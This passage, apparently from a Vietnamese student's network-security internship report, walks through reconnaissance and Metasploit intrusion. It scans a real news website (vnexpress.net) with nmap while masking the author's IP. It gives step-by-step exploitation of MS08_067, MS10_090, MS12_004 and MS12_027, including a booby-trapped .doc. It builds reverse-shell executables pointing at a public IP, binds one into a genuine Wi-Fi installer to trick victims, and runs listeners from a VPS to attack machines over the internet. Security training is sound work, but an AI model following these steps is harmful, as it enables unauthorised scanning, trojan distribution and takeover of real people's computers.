tiêu thông qua các cơ sở dữ liệu công khai như các thông tin về tên miền của tổ chức, danh bạn điện thọai, các trang vàng doanh nghiệp để tìm kiếm địa chỉ, số điện thọai, địa chỉ email của các bộ phận .v.v. Đây là bước rất quan trọng và các attacker thường dành ra đến 90% thời gian để tiến hành thu thập thông tin, còn quá trình tấn công chỉ diễn ra trong 10% trong toàn bộ quá trình. Điều này cũng giống như bước chuẩn bị khi chúng ta cần tiến hành triển khai một công việc nào đó trong quá trình
  • 15. 8 kinh doanh hay phát triển ý tưởng mới. Thông tin càng nhiều thì cơ hội tấn công thành công càng cao. Để tiến hành thu thập thông tin một cách khoa học, các hacker/attacker cần thực hiện theo một sơ đồ như sau: 1. Tìm kiếm từ các nguồn thông tin. 2. Xác định các dãy địa chỉ mạng. 3. Xác định các máy còn họat động 4. Tìm kiếm những port mở (open port) hay điểm truy cập của mục tiêu (access point) 5. Dò tìm hệ điều hành của mục tiêu. 6. Tìm kiếm các dịch vụ đang họat động trên những port mở. 7. Lập mô hình mạng. Thông tin tìm kiếm cần thiết như: 1. Network Informations: Domain, Network blocks, IP, TCP hay UDP, System Enumeration, ACLs, IDSes, v.v.. 2. System Informations: OS, user and group name, system name, kiến trúc system, SNMP, Routing 3. Organziation Informations: Tên công ty, nhân viên, websites, địa chỉ, số điện thoại, Email liên lạc, các kiến thức liên quan đến tình hình kinh doanh của công ty. Trong quá trình này Hacker chủ yếu dùng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu các thông tin hợp pháp về mục tiêu nên footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp. 2.2.3. CÁC KIỂU FOOTPRINTING. 2.2.3.1. Passive Footprinting. Passive footprinting là hình thức tiềm kiếm thông tin thông qua bài báo, trang web, những website hỗ trợ tìm kiếm như: www.google.com, www.tenmien.vn, www.whois.domaintools.com, , www.arcchive.org..., http://centralops.net/co/... Ta tra cứu tên miền vnexpress.net. thông qua trang web:www.tenmien.vn
  • 16. 9 Và đây là toàn bộ thông tin về tên miền vnexpress.net Ta tra cứu tên miền vnexpress.net. thông qua trang web: http://centralops.net/co/
  • 17. 10 Và đây là toàn bộ thông tin về tên miền vnexpress.net
  • 18. 11
  • 19. 12
  • 20. 13 2.2.3.2. ACTIVE FOOTPRING. Active Footprinting là hình thức liên hệ trực tiếp với mục tiêu để thu thập thông tin như công ty, nhân viên, địa chỉ, network, liên lạc qua Email để tìm hiểu các thông tin có thể. Phương pháp này đòi hỏi nhiều kỹ năng giao tiếp, và kỹ năng khai thác thông tin nếu như bạn có đầu óc thám tử thì mọi chuyên trở nên đơn giản rất nhiều. 2.2.4. SCANING LÀ GÌ? Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để hacker quyết định kiểu tấn công nào thích hợp để tấn công vào hệ thống, nếu như quá trình footprinting là việc xác định nguồn thông tin ở đâu thì scanning chính là quà trình sàng lọc, rà soát, tìm kiếm những cánh cổng cũng như lỗ hổng hệ thống để xâm nhập vào những vào nguồn thông tin đó. Trong quá trình scanning, hacker sẽ tìm kiếm những đối tượng sau: - Live system: Xác định xem hệ thống mà chúng ta đang nhắm tới có còn hoạt động hay không. Máy tính (host) đang quét có hoạt động trên internet hay không. Địa chỉ ip có đang trong trạng tháy public. - Port: Mục tiêu tiếp theo là xác định các port đang mở. Việc xác định port này cho phép chúng ta biết máy tính đó đang mở các dịch vụ nào. Từ đó xác định được
  • 21. 14 mục đích của cuộc tấn công. - OS: Xác định hệ điều hành đang sử dụng trên máy tính mục tiêu sẽ giúp hacker tìm ra các lỗ hổng thông dụng. Các hệ điều hành không nhiều thì ít cũng tiềm ẩn những lỗ hổng tạo điều kiện cho kẻ tấn công đột nhập. Xác định hệ điều hành còn phải xác định phiên bản của nó. - Service: Hiểu rõ những dịch vụ đang chạy và lắng nghe trên hệ thống đích. Phiên bản của dịch vụ nào cũng chứa những lỗi nhỏ, mà nếu biết khai thác lỗ nhỏ đó thì nó không còn nhỏ chút nào. - IP Address: Không chỉ có một ip của một host, mà chúng ta cũng cẩn xác định dãy địa chỉ mạng, và những host khác có liên quan như Default gateway, DNS Server - Vulnerability: Các lỗi của host hoặc lỗi của hệ điều hành. 2.2.4.1. CÁC CÔNG CỤ TIỆN ÍCH. http://ultrasurf.us/, ta tải công cụ về để che giấu đi địa chỉ IP thật của máy. http://nmap.org/download.html ta scan những port đang mở/đóng, những dịch vụ đang chạy, cùng với phiên bản đi kèm. http://www.tenable.com/products/nessus/select-your-operating-system công cụ quét lỗi hệ điều hành. 2.2.4.2. QUÁ TRÌNH THỰC HIỆN SCANING. Bước 1. Cho giấu địa chỉ IP của mình để tránh bị phát hiện. Ta truy cập vào trang web http://ultrasurf.us/, ta tải công cụ và cài đặt.
  • 22. 15 Sau đó ta vào website http://ip2location.com/ để kiểm tra IP của máy, kết quả là IP ở Việt Nam. Ta chạy phần mềm ultrasurf, và xuất hiện góc phải bên dưới biểu tượng ổ khóa màu vàng, đây là biểu tượng kích hoạt IP máy đã được thay đổi.
  • 23. 16 Ta truy cập lại website http://ip2location.com/ để kiểm tra IP của máy, kết quả là IP đã thay đổi thành IP của Mỹ. Bước 2: Scan port cùng một trong dãy mạng. Ta bật máy Backtrack5 R3 lên đăng nhập và khởi động Ternimal. Ta gõ lệnh:
  • 24. 17 ping vnexpress.net để xác định địa chỉ IP của trang website là 111.65.248.132 Ta tiếp tục gõ lệnh nmap -sV -O 111.65.248.132
  • 25. 18 Kết quả là ta đã xác định được những port đang mở, tên dịch vụ đang chạy. Ta tiếp tục truy cập website http://news.netcraft.com/ để xác định OS, Web Server mà trang websiter đang chạy. Bước 3: Sau khi xác định được những thông tin như port nào đóng/mở, những dịch vụ đang chạy, phiên bản đi kèm, ta bắt đầu Scan những lỗi liên quan. Ta download và cài đặt công cụ quét lỗi Nessus từ trang web : http://www.tenable.com/products/nessus/select-your-operating-system Giao diện đăng nhập của Nessus:
  • 26. 19 Ta đăng nhập với user và password đã khai báo lúc cài đặt. Thiết lập những Policie, cần thiết để phục vụ quá trình Scan lỗi tương ứng, sau khi đã thiết lập xong, ta bắt đầu Scan lỗi hệ điều hành. Tại ô Name ta điền tên hệ điều hành, Policy ta chọn Policies đã thiết lập trước đó, Target chính là mục tiêu mà ta muốn Scan. Và chon Lauch để bắt đầu Scan. Kết quả sau khi Scan Windows XP Service Pack 2. Những lỗi màu đỏ thể hiện đó chính là những lỗi nghiêm trọng. Màu Vàng chỉ ở mức trung bình, và màu xanh là những thông ti về hệ điều hành.
  • 27. 20 Cuối cùng sau khi đã xác định được những lỗi của hệ điều hành, ta bắt đầu tìm hiểu khai thác những lỗ hỏng đó. 2.2.5. QUÁ TRÌNH XÂM NHẬP HỆ THỐNG QUA CÁC LỖ HỔNG. Cần chuẩn bị 1 máy cài Backtrack và 1 máy đóng vai trò là máy nạn nhân để ta xâm nhập ( sử dụng hệ điều hành XP). Kết nối 2 máy như mô hình bên dưới. 2.2.5.1. LỖI MS08_067.
  • 28. 21 Đặt IP cho máy BackTrack và máy XP. Chắc chắn rằng 2 máy đã kết nối thông với nhau. Tại máy Backtrack,khởi động Metasploit bằng lệnh “msfconsole”. Sau đó gõ lệnh “search ms08_067” để tìm module lỗi trong metasploit.
  • 29. 22 Sau khi tìm kiếm sẽ hiện ra đường dẫn của module. Ta gõ lệnh “use {đường dẫn}” để vào cấu hình module.
  • 30. 23 Gõ lệnh “show options” để xem các thông tin cần thiết lập. Lần lượt cấu hình: - Set RHOST [ip máy xp] - Set payload winsows/meterpreter/reverse_tcp - Set Lhost [ip máy BackTrack]
  • 31. 24 Sau đó gõ lệnh “Exploit” để bắt đầu quá trình khai thác. Sau khi máy BackTrack thông báo đã thiết lập được 1 sessions thì ta đã có thể làm chủ máy nạn nhân. - Gõ lệnh “getuid” để lấy thông tin Username. - Gõ lệnh “sysinfo” để xem thông tin máy nạn nhân. - Gõ lệnh “ shell” để bắt đầu xâm nhập vào máy nạn nhân. Lúc này ta đã có quyền tương đương user đang đăng nhập trên máy nạn nhân.
  • 32. 25 Dấu nhắc lệnh tại cửa sổ console đứng tại “ C:WINDOWSSYSTEM32”. Sử dụng lệnh “md trung” để tạo 1 thư mục có tên “trung” trong thư mục “system32” trên máy XP.
  • 33. 26 Và kết quả trong thư mục “system32” trong ổ đĩa “C” của máy xp đã có thư mục “trung” vừa tạo. Tới đây ta đã hoàn tất quá trình khai thác mã lỗi ms08_067. 2.2.5.2. LỖI MS10_090. Dùng lệnh “ifconfig” để kiểm tra ip máy BackTrack. Tại máy XP, dùng lệnh “ipconfig” để kiểm tra ip.
  • 34. 27 Trên máy BackTrack dùng lệnh “ping [ip máy XP]” để đảm bảo 2 máy đã kết nối thông với nhau. Gõ lệnh “msfconsole” để khởi động metasploit.
  • 35. 28 Gõ lệnh “search ms10_090” để tìm kiếm module lỗi ms10_090.
  • 36. 29 Sau khi có đường dẫn, dùng lệnh “use [đường dẫn của module]” để bắt đầu thiết lập thông số. Dùng lệnh “show options” để biết các thông tin cần thiết lập.
  • 37. 30 Lần lượt thiết lập các thông số bằng các lệnh: - Set srvhost [ip máy backtrack] - Set lhost [ip máy backtrack] - Set payload windows/meterpreter/reverse_tcp Cuối cùng dùng lệnh “Exploit” để khởi động module.
  • 38. 31 Lúc này tại máy Backtrack sẽ tạo ra 1 đường link. Nếu máy XP nhấp vào đường link này thì sẽ bị xâm nhập. Mở trình duyệt IE tại máy XP và truy cập vào đường link được tạo từ máy BackTrack.
  • 39. 32 Lúc này máy BackTrack sẽ gửi mã độc tới máy XP. Và sau đó thực hiện 1 phiên kết nối để xâm nhập. Dùng lệnh “sessions” để xem thông tin phiên kết nối. Tiếp theo dùng lệnh “sessions –I [ID của session]” để bắt đầu xâm nhập.
  • 40. 33 Tới đây ta đã hoàn tất quá trình xâm nhập. Bây giờ ta dùng các lệnh: - Sysinfo: để lấy thông tin máy nạn nhân ( ở đây là máy XP). - Getuid: để lấy thông tin Username. - Shell: xâm nhập vào máy nạn nhân. Thử kết quả bằng cách dùng lệnh “ md trung” để tạo 1 thư mục tên “trung” trên máy nạn nhân.
  • 41. 34 Và kiểm tra trên màn hình máy XP đã có thư mục vừa tạo. 2.2.5.3. LỖI MS12_004. Mã lỗi này khai thác lỗi của file MIDI trong IE. Trước tiên trên máy BackTrack dùng lệnh “ ifconfig” để kiểm tra địa chỉ IP. Sau đó dùng lệnh “ ping [IP máy XP]” để kiểm tra kết nối giữa máy BackTrack và máy XP đã thông với nhau.
  • 42. 35 Sau đó dùng lệnh “msfconsole” để khởi động Metasploit. Dùng lệnh “ search ms12_004” để tìm module của mã lỗi.
  • 43. 36 Sau khi hệ thống tìm ra đường dẫn của module mã lỗi ms12_004. Ta ghi nhớ đường dẫn sau đó dùng lệnh “use [đường dẫn]” để bắt đầu sử dụng.
  • 44. 37 Dùng lệnh “Show options” để xem các thông tin cần thiết lập. Tiếp theo thiết lập các thông số cần thiết bằng các lệnh: - Set SRVHOST [ip máy Backtrack]. - Set LHOST [ip máy BackTrack]. - Set payload windows/meterpreter/reverse_tcp.
  • 45. 38 Cuốt cùng gõ lệnh “ Exploit” để bắt đầu khai thác lỗi. Lúc này máy BackTrack sẽ tạo ra 1 đương link. Khi máy XP truy cập vào đường link này thì sẽ bị xâm nhập.
  • 46. 39 Trên máy XP mở trình duyệt IE và truy cập vào đường link đó. Ngay lập tức máy BackTrac sẽ gửi các đoạn mã độc để xâm nhập dựa vào lỗ hổng.
  • 47. 40 Khi máy Backtrack thông báo đã có 1 phiên kết nối thì lúc đó ta đã có thể xâm nhập vào máy nạn nhân. Dùng lệnh “sessions” để kiểm tra thông tin phiên kết nối.
  • 48. 41 Tiếp theo dùng lệnh “session –I [ID của phiên kết nối]” để xâm nhập vào máy nạn nhân. Tới đây ta đã có thể làm chủ hệ thống của máy nạn nhân. - Dùng lệnh “getuid” để lấy thông tin Username. - Dùng lện “sysinfo” để xem thông tin máy nạn nhân. - Dùng lênh “shell” để xâm nhâp hệ thống.
  • 49. 42 Thử tạo 1 thư mục có tên “trung” bằng lệnh “md trung”. Ngay lập tức trên màn hình máy XP sẽ có thư mục “trung”.
  • 50. 43 Như vậy ta đã hoàn thành khai thác mã lỗi ms12_004. 2.2.5.4. LỖI MS12_027. Lỗi MS12_027 là lỗi mà thông qua bộ công cụ Office hacker sẽ tấn công vào hệ thống và chiếm quyền điều khiển. Trong các phiên bản Office phổ biến (từ 2003, 2007, 2010) đều dính lỗ hổng này. Bắt đầu quá trình tấn công. Ta khởi động Metasploit bằng câu lệnh “msfconsole” trên Backtrack.
  • 51. 44 Dùng lệnh “search ms12_027” để tìm module của mã lỗi trong Metasploit. Sau khi có đường dẫn của module. Dùng lệnh “ use [đường dẫn module]” để sử dụng.
  • 52. 45 Gõ lệnh “ Show options” để xem những thuộc tính cần thiết lập. Cần tạo 1 file giả có định dạng *.doc để làm công cụ xâm nhập máy nạn nhân. Dùng lệnh “ Set filename [ten file].doc”.
  • 53. 46 Tiếp đó lần lượt gõ lệnh: - “Set payload windows/meterpreter/reverse_tcp” : thiết lập payload của module. - “Set LHOST [ip máy Backtrack]” : Thiết lập ip máy lắng nghe. Sau đó gõ lệnh “Exploit” để hoàn thành việc thiết lập thông tin và tạo file giả.
  • 54. 47 Máy Backtrack lúc này sẽ tạo ra file *.doc và thông báo đường dẫn file được tạo ra. Kế tiếp ta cần thiết lập 1 trình lắng nghe và điều khiển máy nạn nhân ( sau khi máy nạn nhân bị nhiễm mã độc trong file *.doc). Dùng lệnh “use exploit/multi/handler”.
  • 55. 48 Sau đó thiết lập các thông số: - “Set payload windows/meterpreter/reverse_tcp” . - “Set LHOST [ip máy Backtrack]”. Sau đó dùng lệnh “Exploit” để bắt đầu lắng nghe và thiết lập phiên kết nối với máy nạn nhân để xâm nhập ngay khi máy nạn nhân bị nhiễm mã độc khi mở file *.doc . Tới đây đã hoàn tất việc thiết lập và triển khai xâm nhập. Giờ ta sẽ chờ máy nạn nhân bị
  • 56. 49 nhiễm mã độc. Cách dễ nhất là đưa file *.doc lên trình duyệt web để nạn nhân tải về. Copy file *.doc được tạo vào thư mục /var/www . Mở console khác lênh gõ lệnh: “cp [đường dẫn tới file *.doc] /var/www”. Sau đó triển khai web server bằng lệnh. “/etc/init.d/apache 2 start”. Từ máy XP truy cập vào địa chỉ “ http://[ip máy backtrack]/[file .doc]” . 1 cửa sổ “ file download” hiện ra.
  • 57. 50 Khi file *.doc được mở tại máy nạn nhân. Ngay lúc này máy Backtrack sẽ kết nối tới máy nạn nhân và bắt đầu xâm nhập. Khi có thông báo 1 session đã được thiết lập thì ta đã có thể chiểm quyền user đang đăng nhập trên máy nạn nhân.
  • 58. 51 - Dùng lệnh “getuid” để lấy thông tin Username. - Dùng lện “sysinfo” để xem thông tin máy nạn nhân. - Dùng lênh “shell” để xâm nhâp hệ thống.
  • 59. 52 Tạo 1 thư mục tên “trung” bằng lệnh “md trung”. Kiểm tra trên màn hình máy XP ta thấy thư mục vừa đươc tạo từ máy Backtrack. Tới đây ta đã kết thúc quá trình xâm nhập qua mã lỗi ms12_027. 2.2.5.5. MỞ PORT TREN MODEM,TẤN CONG NGOAI MẠNG INTERNET.
  • 60. 53 Đầu tiên dùng lệnh “ping” để kiểm tra kết nối internet. Sau đó dùng lệnh “msfpayload windows/shell_reverse_tcp LHOST=[ip mặt ngoài máy Backtrack] LPORT=[port sẽ mở trong modem] X > /tmp/[tên file].exe” để tạo 1 file shell (file thực thi). Sau này ta sẽ gửi file này cho nạn nhân để kết nối với máy nạn nhân. Trong hình dưới : Lhost=1.54.28.158 là ip mặt ngoài của máy Backtrack.( Vào trang whatismyip.com để xem ip này). Lport=4455 là port được chỉ định để lắng nghe phiên kết nối. Port này sẽ được mở trong modem internet và được trả về địa chỉ ip local của máy Backtrack. /tmp/MypublickWifi.exe là file shell ta tạo ra từ câu lệnh này có tên là “MypublicWifi” và được lưu ở đường dẫn /tmp. Dùng lệnh “ifconfig” để xem ip của máy BackTrack trong mạng Lan. Sau này khi mở port ta sẽ trỏ port đó về ip này.
  • 61. 54 Đăng nhập vào modem từ trình duyệt web, vào mục Nat và mở port khi nãy ra đã chọn.
  • 62. 55 Tiếp theo mở cửa sổ console khác và khởi động Metasploit bằng câu lệnh “msfconsole”. Sử dụng module multi/hander trong Metasploit để giữ kết nối. Gõ lệnh : “use exploit/multi/hander”. Lần lượt gõ các lệnh : - “Set payload windows/shell/reverse_tcp”: để chọn payload cho module. - “Set lhost [ip mặt ngoài máy BackTrack]” : Cấu hình ip lắng nghe nhận kết nối trên mạng. - “Set lport [port được mở]” : Cấu hình port lắng nghe. Dùng lệnh “Show options” để kiểm tra lại thông tin đã cấu hình.
  • 63. 56 Tới đây ta dùng lệnh “exploit” để bắt đầu lắng nghe. Việc còn lại là chờ nạn nhân bị nhiễm mã độc khi chạy file shell ta đã tạo ra. Vấn đề là làm sao để nạn nhân thực thi file đó. File shell nằm trong đường dẫn “/tmp/mypublicwifi” mà khi nãy ta đã tạo.
  • 64. 57 Ở đây ta ghép file “mypublicwifi.exe” do Backtrack tạo ra với 1 file setup của phần mềm phát wifi có tên “mypublicwifi.exe” thật sự khác. Việc này sẽ dễ đánh lừa được nạn nhân hơn. Khi ghép xong ta sẽ có 1 file setup của phần mềm mypublicwifi thật sự, tuy nhiên khi nạn nhân chạy file setup này cũng sẽ đồng thời chạy file do Backtrack tạo ra. Để ghép được ta có thể tham khảo trên mạng với từ khóa “bind two *.exe”.
  • 65. 58 Khi nạn nhân chạy file setup này thì máy Backtrack lập tức sẽ tạo kết nối với máy nạn nhân. Khi có thông báo 1 sessions được thiết lập thì ta đã xâm nhập được vào máy nạn nhân. Thử tạo 1 thư mục trên ổ đĩa “C” của máy nạn nhân bằng lệnh : “Cd C: ” : Lệnh này đưa vị trí làm việc về ổ C. “mkdir Trung” : Lệnh này tạo thư mục tên Trung. Và kiểm tra trên máy nạn nhân :
  • 66. 59 Tới đây ta kết thúc việc tấn công máy nạn nhân ngoài mạng internet bằng Metasploit qua việc tạo file shell chứa mã độc. 2.2.5.6. CÀI ĐẶT METASPLOIT TREN VPS. SỬ DỤNG GIAO DIỆN WEB CỦA METASPLOIT KHAI THÁC MÃ LỖI MS10_090 TỪ VPS. Từ VPS tải phần mềm chương trình Metasploit từ web site http://metasploit.com. Cài đặt như các phần mềm khác. Chú ý tắt tường lửa và chương trình anti virut nếu có. Đăng nhập vào VPS, mở giao diện web của Metasploit Community. Chọn Start->program->metasploit->Access metasploit UI.
  • 67. 60 Chọn project, ở đây mình để project default. Click Module ->search. Gõ vào ô tìm kiếm mã lỗi ms10_090. Sau đó click vào module hiện ra.
  • 68. 61 Khai báo thông số srvhost là địa chỉ ip của VPS. Sau đó chọn Run module. Sau khi Module được chạy. Metasploit sẽ tạo ra 1 đường link. Khi victim truy cập đường link này thì sẽ bị xâm nhập.
  • 69. 62 Kiểm tra tính thành công bằng cách từ 1 máy XP được kết nối internet. ta truy cập vào đường link trên. Ngay lập tức Metasloit sẽ gửi các kết nối tới Victim.
  • 70. 63 Khi có thông báo 1 session đã được thiết lập là ta đã thành công. Ta đã có thể xâm nhập hoàn toàn vào máy victim. Xem,tải file,tạo file…làm gì tùy ý.
  • 71. 64 Sau đây là 1 số hình ảnh xâm nhập vào máy victim. Truy cập ổ đĩa trên máy Victim. Tải dữ liệu trên máy Victim.
  • 72. 65 Kết thúc module xâm nhập qua internet bằng mã lỗi ms10_090 với phần mềm Metasploit được cài đặt trên VPS. 2.2.5.7. XÂM NHẬP WINDOWS 8 TỪ VPS. Cần chuẩn bị: - 1 máy Backtrack. - 1 VPS được cài sẵn Metasploit. Trên máy Backtrack. Tạo 1 file thực thi để gửi cho victim. Khi Victim chạy file này thì sẽ bị xâm nhập. Để tạo file shel gõ lệnh: Msfpayload windows/shell_reverse_tcp lhost=[IP VPS] lport=4455 X > /tmp/[ten file].exe. File shell này sẽ đc lưu tại đường dẫn /tmp.
  • 73. 66 Sau đó đăng nhập vào VPS, khởi động metasploit và cấu hình metasploit về chế độ lắng nghe và giữ các kết nối. Gõ các lệnh: - Use exploit/multi/hander : Chuyển về chế độ lắng nghe. - Set payload windows/shell/reverse_tcp : Chọn payload. - Set lhost[ip VPS]: Cấu hình IP lắng nghe. - Set lport 4455: cấu hình port lắng nghe. Sau đó gõ lệnh Exploit để bắt đầu.
  • 74. 67 Việc cần làm bây giờ là gửi file shell ban đầu tạo ở máy Backtrack cho Victim. Mỗi 1 victim chạy file shell thì VPS sẽ bắt được 1 kết nối để xâm nhập. Giờ ta sẽ cho máy windows 8 chạy file shell. Và ngay lập tức VPS sẽ bắt được kết nối và xâm nhập. Dùng lệnh mkdir Trung để tạo 1 thư mục có tên Trung trên màn hình máy windows 8.
  • 75. 68 Kiểm tra trên màn hình máy windows 8 ta đã thấy thư mục Trung. Kết thúc module xâm nhập máy tính windwos 8 từ VPS.
  • 76. 69 CHƯƠNG 3 : NHẬN XÉT- ĐÁNH GIÁ. 3.1. ƯU ĐIỂM. Đề tài an ninh mạng giúp cho em hiểu quá trình tấn công, chúng ta cần phải làm những gì, phải chuẩn bị thu thập những thông tin như thế nào và từ đâu. Sau đó là quá trình tấn công vào hệ thống máy tính nạn nhân. Từ đó biết được cách thức cũng như quá trình hacker sẽ làm gì, qua đó chúng ta sẽ biết được cách phòng thủ và triển khai hệ thống an ninh mạng giúp cho hệ thống của ta an toàn trước những cuộc tấn công. 3.2. KHUYẾT ĐIỂM. Đề tài này em mới được làm quen và tìm hiểu nên đối tượng để xâm nhập em vẫn dùng những hệ điều hành cũ như windows XP, Windows 7. Đến hiện nay Microsoft đã khai tử hệ điều hành XP nên những mã lỗi em thực hiện ở trên đã mất đi 1 phần nào ý nghĩa. Qua đó em thấy được sự rộng lớn của an ninh mạng. Phải thay đổi và cập nhật từng lúc. 3.3. KẾT LUẬN. Trong quá trình nghiên cứu đề tài an ninh mạng em nhận thấy rằng đây là một trong những lĩnh vực rất đa dạng và phong phú và thật sự quan trọng, đặc biệt là vấn đề làm sao cho hệ thống máy tính hoạt động trơn tru, tránh được đe dọa những cuộc tấn công của hacker. Nó không những gây nguy hại đến người dùng mà đặc biệt là những doanh nghiệp, những tập đoàn, ngân hàng, tài chính. Quá trình tìm hiểu và nghiên cứu tại Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn hai tháng, và còn rất nhiều kiến thức khác liên quan em nhận thấy mình cần phải tiếp tục nỗ lực hơn nữa, nhưng đề tài an ninh mạng thật sự rất lôi cuốn và hấp dẫn đối với em. Kiến thức thực tiễn rất đa dạng và phong phú so với những gì em học được và nghiên cứu, em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em là trở thành chuyên gia an ninh mạng cao cấp.